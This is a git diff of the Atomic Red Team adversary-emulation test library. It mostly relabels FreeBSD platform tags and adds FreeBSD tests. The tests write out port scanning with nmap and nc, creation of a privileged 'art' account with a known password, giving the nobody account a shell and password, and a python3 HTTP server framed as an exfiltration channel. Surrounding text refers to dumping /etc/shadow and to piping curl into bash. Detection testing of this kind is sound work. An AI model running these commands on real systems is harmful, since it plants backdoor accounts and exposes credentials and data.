else exit 1; + fi; + + ' + get_prereq_command: "(which pkg && pkg install -y nmap)\n" + executor: + command: | + nmap -sS #{network_range} -p #{port} + telnet #{host} #{port} + nc -nv #{host} #{port} + name: sh + elevation_required: true T1518: technique: modified: '2023-03-30T21:01:50.920Z' @@ -67747,7 +70320,19 @@ discovery: x_mitre_attack_spec_version: 3.1.0 x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 identifier: T1124 - atomic_tests: [] + atomic_tests: + - name: System Time Discovery in FreeBSD/macOS + auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f + description: "Identify system time. Upon execution, the local computer system + time and timezone will be displayed. \n" + supported_platforms: + - linux + - macos + executor: + command: 'date + + ' + name: sh resource-development: T1583: technique: @@ -73810,7 +76395,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: pwd_for_encrypted_file: @@ -73856,7 +76440,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: pwd_for_encrypted_file: @@ -73895,7 +76478,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: cped_file_path: @@ -73946,7 +76528,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: private_key_path: @@ -74364,9 +76945,8 @@ impact: This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break. supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'yes > /dev/null @@ -74529,7 +77109,6 @@ impact: Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -74928,9 +77507,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: timeout: description: Time to restart (can be minutes or specific time) @@ -74948,9 +77526,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: timeout: description: Time to shutdown (can be minutes or specific time) @@ -74968,9 +77545,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'reboot @@ -74983,7 +77559,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux executor: command: 'halt -p @@ -74991,6 +77566,19 @@ impact: ' name: sh elevation_required: true + - name: Reboot System via `halt` - FreeBSD + auto_generated_guid: 7b1cee42-320f-4890-b056-d65c8b884ba5 + description: 'This test restarts a FreeBSD system using `halt`. + + ' + supported_platforms: + - linux + executor: + command: 'halt -r + + ' + name: sh + elevation_required: true - name: Reboot System via `halt` - Linux auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e description: 'This test restarts a Linux system using `halt`. @@ -75010,7 +77598,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux executor: command: 'poweroff @@ -75018,6 +77605,19 @@ impact: ' name: sh elevation_required: true + - name: Reboot System via `poweroff` - FreeBSD + auto_generated_guid: 5a282e50-86ff-438d-8cef-8ae01c9e62e1 + description: 'This test restarts a FreeBSD system using `poweroff`. + + ' + supported_platforms: + - linux + executor: + command: 'poweroff -r 3 + + ' + name: sh + elevation_required: true - name: Reboot System via `poweroff` - Linux auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 description: 'This test restarts a Linux system using `poweroff`. @@ -76619,6 +79219,23 @@ initial-access: whoami exit cleanup_command: "userdel -r art \n" + - name: Create local account (FreeBSD) + auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 + description: 'An adversary may wish to create an account with admin privileges + to work with. In this test we create a "art" user with the password art, switch + to art, execute whoami, exit and delete the art user. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) + | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" + cleanup_command: 'rmuser -y art + + ' - name: Reactivate a locked/expired account (Linux) auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931 description: "A system administrator may have locked and expired a user account @@ -76642,6 +79259,30 @@ initial-access: whoami exit cleanup_command: "userdel -r art \n" + - name: Reactivate a locked/expired account (FreeBSD) + auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf' + description: "A system administrator may have locked and expired a user account + rather than deleting it. \"the user is coming back, at some stage\" An adversary + may reactivate a inactive account in an attempt to appear legitimate. \n\nIn + this test we create a \"art\" user with the password art, lock and expire + the account, try to su to art and fail, unlock and renew the account, su successfully, + then delete the account.\n" + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: | + pw useradd art -g wheel -s /bin/sh + echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0 + pw lock art + pw usermod art -e +1d + pw unlock art + pw user mod art -e +99d + su art + whoami + exit + cleanup_command: "rmuser -y art \n" - name: Login as nobody (Linux) auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85 description: 'An adversary may try to re-purpose a system account to appear @@ -76660,6 +79301,26 @@ initial-access: nobody\nsu nobody\nwhoami\nexit\n" cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n" + - name: Login as nobody (freebsd) + auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310 + description: 'An adversary may try to re-purpose a system account to appear + legitimate. In this test change the login shell of the nobody account, change + its password to nobody, su to nobody, exit, then reset nobody''s shell to + /usr/sbin/nologin. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged + user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho + $(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n" + cleanup_command: | + pw usermod nobody -s /usr/sbin/nologin + cat /etc/passwd |grep nobody + # -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin exfiltration: T1567: technique: @@ -77126,7 +79787,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: input_file: description: Test file to upload @@ -77283,7 +79943,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: domain: description: target SSH domain @@ -77305,7 +79964,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: user_name: description: username for domain @@ -77565,7 +80223,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: file_name: description: File name @@ -77849,7 +80506,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd executor: steps: | 1. Victim System Configuration: @@ -77872,7 +80528,6 @@ exfiltration: ' supported_platforms: - - linux:freebsd - linux executor: steps: "1. On the adversary machine run the below command.\n\n tshark -f @@ -77900,4 +80555,21 @@ exfiltration: command: 'if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi + ' + - name: Python3 http.server (freebsd) + auto_generated_guid: 57a303a2-0bc6-400d-b144-4f3292920a0b + description: 'An adversary may use the python3 standard library module http.server + to exfiltrate data. This test checks if python3.9 is available and if so, + creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, + then kills the PID and unsets the $PID variable. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: false + command: 'if [ $(which python3.9) ]; then cd /tmp; python3.9 -m http.server + 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi + ' diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml index 16801a150f..2e8b758a81 100644 --- a/atomics/Indexes/macos-index.yaml +++ b/atomics/Indexes/macos-index.yaml @@ -829,9 +829,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: numeric_mode: description: Specified numeric mode value @@ -853,9 +852,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: symbolic_mode: description: Specified symbolic mode value @@ -877,9 +875,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: numeric_mode: description: Specified numeric mode value @@ -901,9 +898,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: symbolic_mode: description: Specified symbolic mode value @@ -978,9 +974,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: owner: description: Username of desired owner @@ -2329,7 +2324,6 @@ defense-evasion: supported_platforms: - macos - linux - - linux:freebsd input_arguments: test_message: description: Test message to echo out to the screen @@ -4480,7 +4474,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -4518,7 +4511,6 @@ defense-evasion: description: "Use Perl to decode a base64-encoded text string and echo it to the console \n" supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -4586,7 +4578,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -5449,7 +5440,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -5481,7 +5471,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -5516,7 +5505,6 @@ defense-evasion: Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -5543,7 +5531,6 @@ defense-evasion: This technique was used by the threat actor Rocke during the compromise of Linux web servers. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -7190,9 +7177,8 @@ defense-evasion: Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_to_pad: description: Path of binary to be padded @@ -7225,9 +7211,8 @@ defense-evasion: Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_to_pad: description: Path of binary to be padded @@ -13976,7 +13961,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -14008,7 +13992,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -14039,7 +14022,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -15686,7 +15668,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -15724,7 +15705,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -17093,7 +17073,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -20447,9 +20426,8 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute @@ -29881,9 +29859,8 @@ execution: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute @@ -32038,7 +32015,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -32063,7 +32039,6 @@ execution: Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`. supported_platforms: - - linux:freebsd - linux - macos executor: @@ -35452,9 +35427,8 @@ persistence: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute @@ -36503,7 +36477,6 @@ persistence: description: Turn on Chrome/Chromium developer mode and Load Extension found in the src directory supported_platforms: - - linux:freebsd - linux - windows - macos @@ -36521,7 +36494,6 @@ persistence: auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f description: Install the "Minimum Viable Malicious Extension" Chrome extension supported_platforms: - - linux:freebsd - linux - windows - macos @@ -36538,7 +36510,6 @@ persistence: ' supported_platforms: - - linux:freebsd - linux - windows - macos @@ -39368,9 +39339,8 @@ persistence: persistence on victim host. \nIf the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.\n" supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: name: sh elevation_required: false @@ -48279,7 +48249,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -48860,7 +48829,6 @@ command-and-control: This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -48949,7 +48917,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -48989,7 +48956,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -49028,7 +48994,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -49059,7 +49024,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -49090,7 +49054,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -49121,7 +49084,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -49152,7 +49114,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -49342,9 +49303,8 @@ command-and-control: Note that this test may conflict with pre-existing system configuration. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: proxy_server: description: Proxy server URL (host:port) @@ -49703,7 +49663,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -49733,7 +49692,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -49770,9 +49728,8 @@ collection: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: test_folder: description: Path used to store files. @@ -57401,9 +57358,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: search_path: description: Path where to start searching from. @@ -58320,7 +58276,6 @@ credential-access: ' supported_platforms: - - linux:freebsd - macos - linux input_arguments: @@ -58350,9 +58305,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_path: description: Path to search @@ -58370,9 +58324,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_path: description: Path to search @@ -60879,7 +60832,6 @@ discovery: Upon successful execution, sh will stdout list of usernames. supported_platforms: - - linux:freebsd - linux - macos executor: @@ -61419,7 +61371,6 @@ discovery: auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 description: "(requires root)\n" supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -61443,7 +61394,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -61466,7 +61416,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -61491,7 +61440,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -62144,7 +62092,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -62169,7 +62116,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -62184,9 +62130,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'env @@ -63010,9 +62955,8 @@ discovery: https://perishablepress.com/list-files-folders-recursively-terminal/ supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: output_file: description: Output file used to store the results. @@ -63038,9 +62982,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: output_file: description: Output file used to store the results. @@ -63143,7 +63086,6 @@ discovery: Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout. supported_platforms: - - linux:freebsd - linux - macos dependency_executor_name: sh @@ -63427,7 +63369,6 @@ discovery: Upon successful execution, sh will execute ps and output to /tmp/loot.txt. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -63579,9 +63520,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: | if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; @@ -64099,7 +64039,6 @@ discovery: Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout. supported_platforms: - - linux:freebsd - linux - macos dependency_executor_name: sh @@ -64125,7 +64064,6 @@ discovery: Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -64559,7 +64497,7 @@ discovery: description: "Identify system time. Upon execution, the local computer system time and timezone will be displayed. \n" supported_platforms: - - linux:freebsd + - linux - macos executor: command: 'date @@ -71126,9 +71064,8 @@ impact: This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break. supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'yes > /dev/null @@ -71291,7 +71228,6 @@ impact: Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -71690,9 +71626,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: timeout: description: Time to restart (can be minutes or specific time) @@ -71710,9 +71645,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: timeout: description: Time to shutdown (can be minutes or specific time) @@ -71730,9 +71664,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'reboot @@ -73844,7 +73777,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: input_file: description: Test file to upload @@ -74001,7 +73933,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: domain: description: target SSH domain @@ -74023,7 +73954,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: user_name: description: username for domain @@ -74283,7 +74213,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: file_name: description: File name @@ -74567,7 +74496,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd executor: steps: | 1. Victim System Configuration: diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index 92756f8503..141cfe6858 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml @@ -51018,7 +51018,6 @@ persistence: description: Turn on Chrome/Chromium developer mode and Load Extension found in the src directory supported_platforms: - - linux:freebsd - linux - windows - macos @@ -51036,7 +51035,6 @@ persistence: auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f description: Install the "Minimum Viable Malicious Extension" Chrome extension supported_platforms: - - linux:freebsd - linux - windows - macos @@ -51053,7 +51051,6 @@ persistence: ' supported_platforms: - - linux:freebsd - linux - windows - macos diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md index b73b3e0075..2e8353d5c5 100644 --- a/atomics/T1003.007/T1003.007.md +++ b/atomics/T1003.007/T1003.007.md @@ -85,7 +85,7 @@ Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities copy process memory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** fa37b633-e097-4415-b2b8-c5bf4c86e423 @@ -146,7 +146,7 @@ Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script copy a process's heap memory to an external file so it can be searched or exfiltrated later. On FreeBSD procfs must be mounted. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63 diff --git a/atomics/T1003.008/T1003.008.md b/atomics/T1003.008/T1003.008.md index a064a0d67b..b184d2530b 100644 --- a/atomics/T1003.008/T1003.008.md +++ b/atomics/T1003.008/T1003.008.md @@ -61,7 +61,7 @@ rm -f #{output_file} ## Atomic Test #2 - Access /etc/master.passwd (Local) /etc/master.passwd file is accessed in FreeBSD environments -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 5076874f-a8e6-4077-8ace-9e5ab54114a5 @@ -99,7 +99,7 @@ rm -f #{output_file} ## Atomic Test #3 - Access /etc/passwd (Local) /etc/passwd file is accessed in FreeBSD and Linux environments -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d @@ -137,7 +137,7 @@ rm -f #{output_file} ## Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** df1a55ae-019d-4120-bc35-94f4bc5c4b0a @@ -174,7 +174,7 @@ rm -f #{output_file} ## Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtins Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** f5aa6543-6cb2-4fae-b9c2-b96e14721713 diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md index f9eaa6749b..a2c8d9112c 100644 --- a/atomics/T1007/T1007.md +++ b/atomics/T1007/T1007.md @@ -119,7 +119,7 @@ systemctl --type=service ## Atomic Test #4 - System Service Discovery - service Enumerates system service using service -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** b2e1c734-7336-40f9-b970-b04731cbaf8a diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index 624f633f21..aca4dd507b 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -145,7 +145,7 @@ Identify network configuration information. Upon successful execution, sh will spawn multiple commands and output will be via stdout. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 7625b978-4efd-47de-8744-add270374bee diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index ef3bd8d121..b3cd1ceea3 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -222,7 +222,7 @@ Identify remote systems via arp. Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951 @@ -264,7 +264,7 @@ Identify remote systems via ping sweep. Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de @@ -565,7 +565,7 @@ apt-get install iproute2 -y ## Atomic Test #14 - Remote System Discovery - netstat Use the netstat command to display the kernels routing tables. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** d2791d72-b67f-4615-814f-ec824a91f514 diff --git a/atomics/T1027.001/T1027.001.md b/atomics/T1027.001/T1027.001.md index a0612fdf73..8f5a78af4d 100644 --- a/atomics/T1027.001/T1027.001.md +++ b/atomics/T1027.001/T1027.001.md @@ -18,7 +18,7 @@ Uses dd to add a zero byte, high-quality random data, and low-quality random dat Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a @@ -71,7 +71,7 @@ Uses truncate to add a byte to the binary to change the hash. Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** e22a9e89-69c7-410f-a473-e6c212cd2292 diff --git a/atomics/T1027.004/T1027.004.md b/atomics/T1027.004/T1027.004.md index 7d8432dd55..ea1367cde0 100644 --- a/atomics/T1027.004/T1027.004.md +++ b/atomics/T1027.004/T1027.004.md @@ -122,7 +122,7 @@ Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atom ## Atomic Test #3 - C compile Compile a c file with either gcc or clang on FreeBSD, Linux or Macos. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** d0377aa6-850a-42b2-95f0-de558d80be57 @@ -168,7 +168,7 @@ wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004 ## Atomic Test #4 - CC compile Compile a c file with either gcc or clang on FreeBSD, Linux or Macos. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** da97bb11-d6d0-4fc1-b445-e443d1346efe @@ -214,7 +214,7 @@ wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004 ## Atomic Test #5 - Go compile Compile a go file with golang on FreeBSD, Linux or Macos. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 78bd3fa7-773c-449e-a978-dc1f1500bc52 diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index 681b6e3e9f..733ea6fb82 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -96,7 +96,7 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes `Hello from the Atomic Red Team` and uname -v -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 197ed693-08e6-4958-bfd8-5974e291be6c diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index 2f1eaf4a60..70806f0713 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -12,7 +12,7 @@ ## Atomic Test #1 - Data Transfer Size Limits Take a file/directory, split it into 5Mb chunks -**Supported Platforms:** macOS, Linux, Freebsd +**Supported Platforms:** macOS, Linux **auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index c022c18532..e7487bfb61 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -71,7 +71,7 @@ Identify System owner or users on an endpoint Upon successful execution, sh will stdout list of usernames. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c diff --git a/atomics/T1036.003/T1036.003.md b/atomics/T1036.003/T1036.003.md index fa44abf3fd..a0e6d423a6 100644 --- a/atomics/T1036.003/T1036.003.md +++ b/atomics/T1036.003/T1036.003.md @@ -65,7 +65,7 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro Upon successful execution, sh is renamed to `crond` and executed. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556 diff --git a/atomics/T1036.005/T1036.005.md b/atomics/T1036.005/T1036.005.md index 5f0fccd118..a368e6f101 100644 --- a/atomics/T1036.005/T1036.005.md +++ b/atomics/T1036.005/T1036.005.md @@ -16,7 +16,7 @@ Adversaries may also use the same icon of the file they are trying to mimic.cron in Linux or Unix environments to execute ## Atomic Test #1 - Cron - Replace crontab with referenced file This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75 @@ -103,7 +103,7 @@ rm /etc/cron.weekly/#{cron_script_name} ## Atomic Test #3 - Cron - Add script to /etc/cron.d folder This test adds a script to /etc/cron.d folder configured to execute on a schedule. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 078e69eb-d9fb-450e-b9d0-2e118217c846 diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md index d27ab7796e..504d424539 100644 --- a/atomics/T1056.001/T1056.001.md +++ b/atomics/T1056.001/T1056.001.md @@ -194,7 +194,7 @@ There are several variables that can be set to control the appearance of the bas To gain persistence the command could be added to the users .shrc or .profile -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** b04284dc-3bd9-4840-8d21-61b8d31c99f2 @@ -243,7 +243,7 @@ When a command is executed in bash, the BASH_COMMAND variable contains that comm To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 7f85a946-a0ea-48aa-b6ac-8ff539278258 diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md index f45a48cf9d..1afa1c4095 100644 --- a/atomics/T1057/T1057.md +++ b/atomics/T1057/T1057.md @@ -28,7 +28,7 @@ Utilize ps to identify processes. Upon successful execution, sh will execute ps and output to /tmp/loot.txt. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 4ff64f0b-aaf2-4866-b39d-38d9791407cc diff --git a/atomics/T1059.004/T1059.004.md b/atomics/T1059.004/T1059.004.md index 38842c113b..9f99e7c698 100644 --- a/atomics/T1059.004/T1059.004.md +++ b/atomics/T1059.004/T1059.004.md @@ -48,7 +48,7 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter ## Atomic Test #1 - Create and Execute Bash Shell Script Creates and executes a simple sh script. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 @@ -90,7 +90,7 @@ Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is gen Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 